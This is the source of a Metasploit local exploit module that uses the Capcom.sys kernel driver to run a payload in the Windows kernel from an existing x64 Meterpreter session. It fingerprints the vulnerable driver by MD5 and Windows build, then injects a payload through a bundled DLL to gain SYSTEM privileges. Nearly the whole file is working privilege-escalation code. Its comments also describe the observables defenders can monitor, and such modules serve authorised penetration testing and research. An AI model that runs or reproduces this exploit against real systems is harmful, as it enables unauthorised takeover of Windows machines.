Path: blob/master/modules/exploits/windows/local/capcom_sys_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Kernel code execution from an existing x64 Meterpreter session by way of
# the Capcom.sys driver (see 'Description' below). All user-land logic lives
# here; the kernel-side work is in the bundled capcom_sys_exec.x64.dll that
# `exploit` hands to execute_dll.
#
# The observables `check` keys on are the same ones a defender can monitor:
# a loaded driver with basename capcom.sys whose on-disk MD5 matches the
# expected_checksum value in `check`, on an x64 client build of Windows at or
# below 10.0.22000.194 (later builds carry a driver block list).
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  # AutoCheck gates `exploit` on the result of `check`; `exploit` below also
  # calls `check` itself and fails on Safe/Unknown.
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',
          'Description' => %q{
            This module abuses the Capcom.sys kernel driver's function that allows for an
            arbitrary function to be executed in the kernel from user land. This function
            purposely disables SMEP prior to invoking a function given by the caller.
            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'TheWack0lian', # Issue discovery
            'OJ Reeves' # exploit and msf module
          ],
          'Arch' => [ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Targets' => [
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
          ],
          'Payload' => {
            'Space' => 4096,
            'DisableNops' => true
          },
          'References' => [
            ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']
          ],
          'DisclosureDate' => '1999-01-01', # non-vuln exploit date
          'DefaultTarget' => 0,
          # Meterpreter commands `check` depends on: md5 of the driver file and
          # the driver list enumeration.
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_fs_md5
                stdapi_sys_config_driver_list
              ]
            }
          }
        }
      )
    )
  end

  # Decide whether the session host is exploitable.
  #
  # Returns Exploit::CheckCode::Unknown when the platform or Windows version
  # cannot be assessed (non-Windows, pre-Win7, or a server SKU), Safe when the
  # host is x64 but either the build carries the driver block list or no
  # capcom.sys with the expected MD5 is loaded, and Appears when a loaded
  # capcom.sys matches the expected checksum. Note that `exploit` treats
  # Unknown and Safe the same way (both abort).
  def check
    return Exploit::CheckCode::Unknown unless session.platform == 'windows'

    version = get_version_info
    # Pre-Windows 7 and server SKUs are outside what the module supports.
    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
      return Exploit::CheckCode::Unknown
    end

    # These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys
    if version.build_number > Rex::Version.new('10.0.22000.194')
      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')
    end

    # The bundled DLL is x64 only.
    if sysinfo['Architecture'] != ARCH_X64
      return Exploit::CheckCode::Safe
    end

    # Validate that the driver has been loaded and that
    # the version is the same as the one expected
    client.sys.config.getdrivers.each do |d|
      next unless d[:basename].downcase == 'capcom.sys'

      # Only this exact driver build is treated as vulnerable. A loaded
      # capcom.sys with any other hash falls through to Safe, as does the
      # case where the driver is not loaded at all.
      expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'
      target_checksum = client.fs.file.md5(d[:filename])

      # The md5 result is hex-encoded before comparing with the string above.
      if expected_checksum == Rex::Text.to_hex(target_checksum, '')
        return Exploit::CheckCode::Appears
      end
    end

    return Exploit::CheckCode::Safe
  end

  # Run the module: refuse already-elevated sessions, re-run `check`, reject
  # WOW64/x86 mismatches, then pass the encoded payload to execute_dll with the
  # bundled x64 DLL from the framework data directory.
  #
  # Raises via fail_with (Failure::None, Failure::NotVulnerable or
  # Failure::NoTarget) on any of the precondition failures below.
  def exploit
    # Nothing to gain if the session is already SYSTEM.
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    # Explicit re-check in addition to AutoCheck; Unknown is treated as
    # not-vulnerable rather than attempted.
    check_result = check
    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

    # On an x64 host both the session process and the selected target must be x64.
    if sysinfo['Architecture'] == ARCH_X64
      if session.arch == ARCH_X86
        fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')
      end

      if target.arch.first == ARCH_X86
        fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
      end
    end

    encoded_payload = payload.encoded
    # DLL path is resolved under Msf::Config.data_directory, so the module
    # depends on the data/exploits/capcom_sys_exec tree being present.
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),
      encoded_payload
    )

    # execute_dll returning does not by itself confirm the payload ran; hence the wording.
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end